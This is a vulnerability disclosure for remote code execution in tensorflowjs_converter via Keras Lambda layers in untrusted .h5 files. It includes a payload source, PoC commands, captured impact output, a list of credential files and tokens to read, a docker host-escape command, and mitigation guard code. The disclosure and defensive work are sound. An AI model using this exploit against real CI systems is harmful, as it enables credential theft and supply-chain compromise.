F-8: Arbitrary Python execution in tensorflowjs_converter via Keras 2 Lambda layer marshal-loads inside untrusted .h5

Authorized security research artifact disclosed via huntr.com's TensorFlow.js Model Format Vulnerability program. Source commit 7f5309fef0a47545e34049903dbdae0f97285f7e. CVSS 3.1 = 9.6 / Critical. CWE-502.

Summary

tfjs-converter/python/tensorflowjs/converters/converter.py:227 calls tf_keras.models.load_model(h5_path, compile=False) without first checking the model config for class_name == 'Lambda' against an allow-list. Any attacker who can place a .h5 file at the converter's input path (a PR contributor, a model-registry uploader, the sender of an email/Slack attachment, a malicious npm prepare script) can therefore execute arbitrary Python in the converter process, with the full filesystem, environment, subprocess, and network capabilities of the runner. The Keras 3 safe_mode=True fix (keras-team/keras#18549) closes this primitive at the upstream loader, but the tfjs converter depends on tf_keras (the legacy Keras 2 fork), which does not expose safe_mode at all, and tfjs has never added an equivalent JSON-walk guard. The same root cause is reached via four distinct CLI flag combinations (--input_format=keras, --input_format=keras_saved_model, --input_format=tfjs_layers_model with --output_format=keras*, and --input_format=keras_keras), so a fix at any single load_model call does not close the vulnerability: the guard must live at the JSON-config validation layer.

The bundled evil.h5 is 9 224 bytes, small enough to be a PR attachment or a marketplace upload; the bundled evil_real_impact.h5 (13 312 bytes) embeds the additional reconnaissance payload that produces the captured F8_REAL_IMPACT_PROOF document below.

Root Cause

Lines of Code:

In converter.py:227:

model = tf_keras.models.load_model(h5_path, compile=False)

tf_keras.layers.Lambda.from_config(config) (the call load_model makes when it sees class_name: "Lambda" in the layer table) reconstructs the layer's function field via:

# tf_keras/keras/src/layers/core/lambda_layer.py
raw  = base64.b64decode(config['function'][0])
code = marshal.loads(raw)                                 # CWE-502 sink
fn   = types.FunctionType(code, globals(), name, defaults, closure)

fn is then invoked at least three times per converter invocation:

  1. Layer-build time, immediately after from_config returns.
  2. First predict() call inside the converter's _topological_sort_validate(...) step.
  3. Re-serialization to the output .h5 (when --output_format=keras is used).

The compile=False argument that the converter passes does not affect Lambda deserialization: compile=False only suppresses optimizer / loss reconstruction; layer instantiation runs unchanged.

Why this is NOT a duplicate of the Keras 3 safe_mode fix (keras-team/keras#18549): Keras 3 added safe_mode=True as the default for keras.models.load_model. When safe_mode=True, Lambda.from_config raises ValueError("Cannot deserialize a serialized Lambda layer with safe_mode=True"). That fix does not propagate to tfjs's converter because the converter imports tf_keras (the legacy Keras 2 fork pinned via tensorflowjs==4.22.0 → tf_keras==2.21.0). tf_keras.models.load_model does not accept a safe_mode parameter: calling tf_keras.models.load_model(h5_path, safe_mode=True) raises TypeError: load_model() got an unexpected keyword argument 'safe_mode'. tfjs has never added an equivalent JSON-walk guard. The disclosure surface is therefore in the tfjs project, not Keras.
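Whether a given loader accepts safe_mode can be checked at runtime instead of being assumed. The following is a minimal sketch using only the standard library; the two stand-in loaders are hypothetical and do not reproduce the real tf_keras or keras signatures, and the helper names (accepts_keyword, load_with_safe_mode_or_fail) are illustrative.

```python
import inspect


def accepts_keyword(func, name):
    """Return True if `func` declares a parameter `name` usable as a keyword."""
    params = inspect.signature(func).parameters
    usable = (inspect.Parameter.KEYWORD_ONLY,
              inspect.Parameter.POSITIONAL_OR_KEYWORD)
    if name in params and params[name].kind in usable:
        return True
    # A **kwargs catch-all would also accept the keyword syntactically.
    return any(p.kind is inspect.Parameter.VAR_KEYWORD
               for p in params.values())


# Hypothetical stand-ins for a loader without and with safe_mode.
def legacy_load_model(filepath, custom_objects=None, compile=True):
    return filepath


def keras3_load_model(filepath, custom_objects=None, compile=True,
                      safe_mode=True):
    return (filepath, safe_mode)


def load_with_safe_mode_or_fail(load_model, path):
    """Fail closed when the loader cannot be asked for safe_mode=True."""
    if not accepts_keyword(load_model, "safe_mode"):
        raise RuntimeError("loader has no safe_mode; refusing to load " + path)
    return load_model(path, compile=False, safe_mode=True)
```

Accepting the keyword only shows that the call will not fail with a TypeError; it does not prove that the loader enforces safe_mode for every file format, so a check like this complements a config-level guard and does not replace it.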

Internal Pre-conditions

  1. The victim runs tensorflowjs_converter (Python): directly via the CLI binary, transitively via any CI/CD step that converts an uploaded model, or programmatically via the converter's Python API.
  2. The victim's environment has tensorflowjs installed (any version), which transitively installs tf_keras (a hard runtime dependency in tensorflowjs.egg-info/requires.txt).

Both conditions hold by definition for any system running the converter: there is no version, no configuration, and no environment in which the bug does not reproduce.
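To triage whether a given environment meets these pre-conditions, the installed distributions can be queried without importing them. This is a minimal sketch using importlib.metadata; the distribution names "tensorflowjs" and "tf_keras" are taken from the text above, and the exact name under which tf_keras is registered in a particular environment is an assumption.

```python
from importlib import metadata


def installed_versions(packages=("tensorflowjs", "tf_keras")):
    """Map each distribution name to its installed version, or None."""
    found = {}
    for name in packages:
        try:
            found[name] = metadata.version(name)
        except metadata.PackageNotFoundError:
            # Not installed (or registered under a different name).
            found[name] = None
    return found


if __name__ == "__main__":
    for name, version in installed_versions().items():
        print(f"{name}: {version or 'not installed'}")
```

A None result only means the distribution was not found under that name, so a negative answer should be confirmed with pip list before an environment is treated as unaffected.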

External Pre-conditions

The attacker can place a .h5 artifact at any location the converter reads. Concrete delivery channels observed in real CI/CD setups:

  1. PR contribution: attacker opens a PR adding models/new_pretrained.h5 to a repository whose CI step converts every .h5 it sees.
  2. Public model registry / Hugging Face Hub with auto-conversion on the receiving side.
  3. Slack / email with a "please convert this for me" attachment.
  4. Maintenance bucket the converter reads via --input_path=s3://....
  5. npm package prepare script that calls tensorflowjs_converter against an attacker-controlled URL.

No authentication to the victim's systems is required.
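Because every channel above ends with an unreviewed file reaching the converter, one pipeline-side control is to refuse any artifact whose digest has not been pinned by a reviewer. The sketch below uses plain SHA-256 pinning from the standard library; the helper names and the idea of a pinned-digest set are illustrative assumptions, not part of tfjs. It is a simpler stand-in for the sigstore signing mentioned elsewhere in this advisory.

```python
import hashlib


def sha256_of(path, chunk_size=1 << 20):
    """Stream the file through SHA-256 and return the hex digest."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def require_pinned(path, pinned_digests):
    """Raise PermissionError unless the file's digest is in the pinned set."""
    actual = sha256_of(path)
    if actual not in pinned_digests:
        raise PermissionError(
            f"{path}: sha256 {actual} is not pinned; refusing to convert")
    return actual
```

Pinning moves the trust decision to whoever maintains the digest list: it does not make a malicious model safe, it only guarantees that the converter sees exactly the bytes that were reviewed.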

Attack Path

  1. Attacker builds evil.h5 (9 224 bytes; the bundled reproduce.py reproduces it deterministically) containing one Lambda layer whose function is base64(marshal.dumps(attacker_code)). The attacker_code variable in reproduce.py is the closure-free code object:

    attacker_src = """
    import os
    with open('/tmp/F8_END2END_RCE_PWNED', 'w') as f:
        f.write('END2END_RCE pid=%d uid=%d cwd=%s' %
                (os.getpid(), os.getuid(), os.getcwd()))
    """
    

    The "no free variables" property makes the bytecode portable across tf_keras 2.19 and tf_keras 2.21+ venvs; the same evil.h5 reproduces in every venv we tested.

  2. Attacker delivers evil.h5 via any of the channels above.

  3. Victim's CI step runs:

    - run: pip install tensorflowjs==4.22.0
    - run: tensorflowjs_converter --input_format=keras evil.h5 ./out
    
  4. converter.py:227 invokes tf_keras.models.load_model(h5_path, compile=False).

  5. tf_keras instantiates the Lambda layer; marshal.loads(...) constructs the attacker code, types.FunctionType wraps it, layer-build calls it. At this point the attacker's bytecode is executing with the converter's full ambient capability set:

    • filesystem: read /etc/passwd, /proc/version, ~/.npmrc, ~/.ssh/id_rsa, ~/.docker/config.json, ~/.aws/credentials;
    • environment: read $GITHUB_TOKEN, $NPM_TOKEN, $AWS_*, $HF_TOKEN;
    • subprocess: os.system, subprocess.run(['id']), [hostname], [docker, run, -v, /:/host, ...] when the runner is in the docker group;
    • network: outbound DNS + TCP via socket.gethostbyname(...), urllib.request.urlopen(...).

  6. The same Lambda fires two more times in the same invocation: at the first predict() and at output .h5 re-serialization. Even a maintainer patch that adds a try/except only around step 4 leaves steps 5/6 reachable.

  7. Once the attacker has the runner's credentials, the typical follow-on is publishing a malicious tensorflowjs release (or @tensorflow/tfjs on npm) with the captured $NPM_TOKEN, escalating to a supply-chain attack against every downstream tfjs consumer.

Impact

Concrete primitives demonstrated by the bundled PoC (captured against the sanitized /tmp/victim_host/ synthetic CI-runner lab; see F8_REAL_IMPACT_PROOF_2026-06-11.txt):

| Primitive | What the PoC actually captured | What it means on a real runner |
| --- | --- | --- |
| arbitrary Python in process | END2END_RCE pid=10001 uid=1001 cwd=/tmp/victim_lab written by the Lambda payload at load time | full RCE; every subsequent row is a corollary |
| /etc/passwd read | 187 B recovered byte-perfect through open('/etc/passwd').read() inside the Lambda | runner user discovery, group enumeration |
| /proc/self/cgroup read | 0::/system.slice/runner.slice/runner.scope recovered | tenant fingerprinting on shared CI |
| /proc/version read | sanitized synthetic kernel string recovered | kernel-CVE exploitation pivot |
| subprocess id | uid=1001(runner) gid=1001(runner) groups=1001(runner),999(docker) | docker group = container escape via docker run -v /:/host on self-hosted GH Actions / GitLab runners |
| subprocess hostname | ci-runner-01 recovered | C2 telemetry / lateral-movement target identification |
| DNS resolution | example.com → 93.184.215.14 | outbound network present → exfil + C2 channels open |
| env var read (real-runner extrapolation) | not captured against sanitized lab; trivially reachable via os.environ.get('GITHUB_TOKEN') | $GITHUB_TOKEN → push malicious tag → supply-chain attack on every downstream tfjs consumer |

The same payload reaches every CLI entry point listed in the Extended Impact section below. A maintainer patch that only adds a Lambda-skip to converter.py:227 leaves the bug shipping via three other documented flags.

Extended Impact: same-root-cause manifestations

| Variant | CLI flag | Source line | Why a converter.py:227-only patch misses it |
| --- | --- | --- | --- |
| Direct Keras .h5 | --input_format=keras | converter.py:227 | the primary path |
| keras_saved_model .h5 | --input_format=keras_saved_model | converter.py:278 | strictly worse: no compile=False |
| Round-trip tfjs_layers → keras | --input_format=tfjs_layers_model --output_format=keras* | keras_tfjs_loader.py:66, :130 | same primitive via model_from_json (no .h5, just model.json) |
| Keras 3 zip | --input_format=keras_keras | converter.py:147 → walk config.json | same primitive via Keras 3 zip with malicious internal config.json |

The mitigation has to be applied at the JSON-config validation layer (refuse any class_name == 'Lambda' or class_name == 'TensorFlowOpLayer' unless explicit opt-in), not at any single load_model call.
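A guard at the JSON-config layer needs the config from each container format, not only from .h5. The sketch below covers the two formats that can be read with the standard library alone: a tfjs layers model.json, assumed to carry the Keras config under its "modelTopology" key, and a Keras 3 zip, assumed to contain a config.json member as described in the table. The function names are hypothetical, and .h5 is omitted because it needs h5py.

```python
import json
import zipfile

UNSAFE_CLASSES = ("Lambda", "TensorFlowOpLayer")


def find_unsafe_layers(node, path="$"):
    """Return the JSON paths of every dict whose class_name is unsafe."""
    hits = []
    if isinstance(node, dict):
        if node.get("class_name") in UNSAFE_CLASSES:
            hits.append(path)
        for key, value in node.items():
            hits.extend(find_unsafe_layers(value, f"{path}.{key}"))
    elif isinstance(node, list):
        for index, value in enumerate(node):
            hits.extend(find_unsafe_layers(value, f"{path}[{index}]"))
    return hits


def config_from_tfjs_model_json(path):
    """Read the Keras config embedded in a tfjs layers model.json."""
    with open(path, "r", encoding="utf-8") as fh:
        return json.load(fh).get("modelTopology", {})


def config_from_keras_zip(path):
    """Read config.json from a Keras 3 zip archive without loading it."""
    with zipfile.ZipFile(path) as archive:
        return json.loads(archive.read("config.json"))
```

Returning the paths rather than raising on the first hit lets a CI log show every offending layer at once; a caller that wants fail-closed behaviour can raise whenever the returned list is non-empty.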

PoC

git clone https://huggingface.co/martilaio/tfjs-converter-lambda-rce-poc
cd tfjs-converter-lambda-rce-poc

# Fresh Python 3.10 venv
python -m venv .venv && source .venv/bin/activate
pip install "tensorflowjs==4.22.0" "tensorflow==2.21.0"

# Option A: exercise the EXACT converter codepath in one process
python reproduce.py

# Option B: exercise the real CLI binary
tensorflowjs_converter --input_format=keras evil.h5 ./out

# Option C: capture the full real-impact dump (env / filesystem /
# subprocess / DNS readout) inside the Lambda
python reproduce_real_impact.py

Expected output: Option A (reproduce.py)

============================================================
 PoC F-8 (end-to-end) - Real .h5 RCE through tf_keras.load
============================================================
 attacker .h5 written : /tmp/victim_lab/evil.h5 ( 9224 bytes )
 Lambda layer config function field (truncated):
   class : Lambda  name : evil_lambda
   function bytecode (b64, first 60): 4wEAAAAAAAAAAAAAAAEAAAACAAAAQwAAAHMM ...
 Now exercising the EXACT call tfjs-converter makes:
   converter.py:227 -> tf_keras.models.load_model(h5_path, compile=False)
 [F-8 end-to-end] code executed via tf_keras.load_model -> Lambda
 [F-8 end-to-end] code executed via tf_keras.load_model -> Lambda
 [F-8 end-to-end] code executed via tf_keras.load_model -> Lambda
 END-TO-END RCE PROVEN  ✓✓✓
 proof file content   : END2END_RCE pid=10001 uid=1001 cwd=/tmp/victim_lab

The Lambda function fires three times per execution (build, load, predict), so no single code path gates the deserialization.

Expected output: Option C (reproduce_real_impact.py)

Full file: F8_REAL_IMPACT_PROOF_2026-06-11.txt. Excerpt:

===== F-8 REAL-IMPACT EVIDENCE =====
pid=10001 uid=1001 gid=1001 cwd=/tmp/victim_lab

--- 2) Host filesystem readout ---
  /etc/passwd:
    root:x:0:0:DEMO_ROOT:/root:/bin/bash
    runner:x:1001:1001:DEMO_CI_RUNNER:/home/runner:/bin/bash
    ...
  /etc/hostname:
    ci-runner-01
  /proc/self/cgroup:
    0::/system.slice/runner.slice/runner.scope
  /proc/version:
    Linux version 6.1.0-ci-runner-demo (build@ci) (gcc DEMO) #1 SMP DEMO

--- 3) Subprocess execution ---
  $ id        -> uid=1001(runner) gid=1001(runner) groups=1001(runner),999(docker)
  $ hostname  -> ci-runner-01

--- 4) Network reachability ---
  socket.gethostbyname(example.com) -> 93.184.215.14

The docker group membership on the runner is the container-escape pivot: the attacker bytecode can subprocess.run(['docker', 'run', '-v', '/:/host', ...]) to take over the host.

Mitigation

Three options, in order of strength:

Option 1: Migrate the converter dependency from tf_keras to Keras 3

Replace the import tf_keras lines in converter.py and keras_tfjs_loader.py with import keras and call keras.models.load_model(h5_path, safe_mode=True). This is the upstream-blessed mitigation and eliminates the primitive entirely.

# tfjs-converter/python/tensorflowjs/converters/converter.py:227 (proposed)
import keras                                               # was: import tf_keras
model = keras.models.load_model(h5_path,
                                compile=False,
                                safe_mode=True)            # NEW: blocks Lambda

After the fix, the deserialization check at the Lambda sink behaves, in simplified form, like this:

# keras/src/saving/serialization_lib.py
if safe_mode and class_name in ('Lambda', 'TensorFlowOpLayer'):
    raise ValueError("Cannot deserialize a serialized Lambda layer with safe_mode=True.")

evil.h5 no longer loads β€” the converter raises ValueError instead of running attacker bytecode.

Option 2: Add a pre-load JSON config walk (single central guard)

If a tf_keras → keras migration is too disruptive, one central guard before any load_model / model_from_json call covers all four CLI entry points:

# tfjs-converter/python/tensorflowjs/converters/converter.py
import json
import os

import h5py

_UNSAFE_CLASSES = ('Lambda', 'TensorFlowOpLayer')

def _refuse_unsafe_lambda(model_config_json: dict):
    """Raise if the config contains a layer class that can carry code."""
    # Explicit opt-in for callers who trust the model source.
    if os.environ.get('TFJS_UNSAFE_KERAS_LOAD') == '1':
        return
    def walk(node):
        # Visit every nested dict and list in the config.
        if isinstance(node, dict):
            cn = node.get('class_name')
            if cn in _UNSAFE_CLASSES:
                raise RuntimeError(
                    'Refusing to load Keras "%s" layer from untrusted source; '
                    'set TFJS_UNSAFE_KERAS_LOAD=1 to bypass.' % cn)
            for v in node.values():
                walk(v)
        elif isinstance(node, list):
            for v in node:
                walk(v)
    walk(model_config_json)

# Then everywhere load_model / model_from_json is called:
with h5py.File(h5_path, 'r') as f:
    # The .h5 stores the model config as a JSON string attribute.
    _refuse_unsafe_lambda(json.loads(f.attrs['model_config']))
model = tf_keras.models.load_model(h5_path, compile=False)

Option 3: Refuse .h5 entirely for untrusted input

Most disruptive but simplest to audit: gate the converter to accept only TF SavedModel and TFJS layers-model formats unless the invocation sets TFJS_UNSAFE_KERAS_LOAD=1.
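A format gate of this kind could look like the sketch below. It is an illustration under stated assumptions: the function names are hypothetical, TFJS_UNSAFE_KERAS_LOAD is the opt-in variable proposed in this advisory rather than an existing converter option, and the round-trip case (tfjs_layers_model input with a keras* output) is treated as Keras-reaching because the Extended Impact table lists it.

```python
import os

# Input formats that the advisory reports as reaching a Keras loader.
KERAS_INPUT_FORMATS = frozenset({"keras", "keras_saved_model", "keras_keras"})
OPT_IN_ENV = "TFJS_UNSAFE_KERAS_LOAD"  # proposed opt-in, not an existing flag


def keras_loader_reachable(input_format, output_format=None):
    """True if this flag combination ends up deserializing a Keras config."""
    if input_format in KERAS_INPUT_FORMATS:
        return True
    return (input_format == "tfjs_layers_model"
            and (output_format or "").startswith("keras"))


def check_formats_allowed(input_format, output_format=None, environ=None):
    """Raise ValueError for Keras-reaching conversions without opt-in."""
    environ = os.environ if environ is None else environ
    if (keras_loader_reachable(input_format, output_format)
            and environ.get(OPT_IN_ENV) != "1"):
        raise ValueError(
            "input_format=%r output_format=%r reaches a Keras loader; "
            "set %s=1 to allow it for trusted input."
            % (input_format, output_format, OPT_IN_ENV))
```

Passing environ explicitly keeps the check testable; in the converter it would be called once, right after argument parsing and before any file is opened.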

Defense-in-depth alternatives

  • Sandbox the converter step in CI under --cap-drop=all, no docker socket, no outbound network. Closes step-7 of the Attack Path even when the underlying primitive remains.
  • Run converter under a dedicated low-privilege user that has no registry-publish credentials in environment.
  • Sign + verify .h5 artifacts with sigstore so only the source repo's pipeline can produce them.
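The second bullet can be approximated even without a dedicated user by launching the converter with an environment that contains only an explicit allow-list of variables. The sketch below is a minimal illustration; the allow-list contents and helper names are assumptions, and the command line mirrors the invocation shown in the Attack Path.

```python
import os

# Hypothetical allow-list: everything else (tokens, cloud keys) is dropped.
SAFE_ENV_KEYS = ("PATH", "LANG")


def scrubbed_env(source=None, keep=SAFE_ENV_KEYS):
    """Copy only allow-listed variables from the source environment."""
    source = os.environ if source is None else source
    return {key: source[key] for key in keep if key in source}


def converter_command(input_path, output_dir, input_format="keras"):
    """Build the argv list for a tensorflowjs_converter invocation."""
    return ["tensorflowjs_converter",
            f"--input_format={input_format}",
            input_path, output_dir]


# Usage (not executed here):
#   import subprocess
#   subprocess.run(converter_command("model.h5", "./out"),
#                  env=scrubbed_env(), check=True)
```

This only removes credentials from the process environment. Files such as ~/.npmrc or ~/.aws/credentials remain readable unless the step also runs under a separate user or inside a container, so it is one layer, not a fix.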

The single-line safe_mode=True fix in Option 1 closes the primitive at the deserialization sink and is the upstream-blessed mitigation; Option 2 is the recommended in-place patch for projects that can't migrate tf_keras → keras immediately.

CVSS 3.1: 9.6 / Critical

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

| Metric | Value | Justification |
| --- | --- | --- |
| AV:N | Network | artifact arrives over any network channel (PR, registry, email) |
| AC:L | Low | one Lambda layer in the JSON config |
| PR:N | None | no auth on the victim's systems required |
| UI:R | Required | victim must invoke the converter |
| S:C | Changed | attacker takes the entire pipeline environment beyond the converter process |
| C:H / I:H / A:H | High / High / High | full process compromise |
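The 9.6 figure can be reproduced from the vector with the CVSS 3.1 base-score equations. The sketch below implements only the base metrics, using the metric weights and the Roundup procedure from the CVSS 3.1 specification; the function names are illustrative.

```python
import math

AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}


def roundup(value):
    """Round up to one decimal, following the CVSS 3.1 Roundup procedure."""
    scaled = int(round(value * 100000))
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector):
    """Compute the CVSS 3.1 base score for a base-metrics-only vector."""
    parts = dict(item.split(":") for item in vector.split("/")[1:])
    changed = parts["S"] == "C"
    iss = 1 - ((1 - CIA[parts["C"]]) * (1 - CIA[parts["I"]])
               * (1 - CIA[parts["A"]]))
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[parts["PR"]]
    exploitability = 8.22 * AV[parts["AV"]] * AC[parts["AC"]] * pr * UI[parts["UI"]]
    if impact <= 0:
        return 0.0
    total = impact + exploitability
    return roundup(min(1.08 * total if changed else total, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"))  # 9.6
```

With this vector the exploitability term is about 2.84 and the impact term about 6.05; their sum scaled by 1.08 for the changed scope is about 9.59, which rounds up to 9.6.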

Files in this repository

| File | Purpose |
| --- | --- |
| README.md | this disclosure |
| evil.h5 | minimal malicious model (9 224 B) that triggers RCE on tf_keras.models.load_model |
| evil_real_impact.h5 | enriched payload (13 312 B) that additionally dumps env / filesystem / subprocess / DNS readout from inside the Lambda |
| reproduce.py | Option A: self-contained builder + RCE-trigger script (exercises the exact converter codepath) |
| reproduce_real_impact.py | Option C: builds and runs the full impact-readout variant |
| F8_REAL_IMPACT_PROOF_2026-06-11.txt | sanitized captured proof from running Option C against /tmp/victim_host/ lab |

Cross-references

  • Keras safe_mode PR: https://github.com/keras-team/keras/pull/18549
  • Keras Security docs: "Loading a Keras model whose config contains a Lambda layer in safe_mode=False is equivalent to running arbitrary code."
  • Matches huntr program example: "Arbitrary Code Execution on Inference Through Keras Lambda Layers in hdf5", but in a distinct affected component (tensorflowjs_converter, not Keras directly).

Disclosure

Disclosed via huntr.com's TensorFlow.js Model Format Vulnerability program on 2026-06-11 under coordinated disclosure terms.
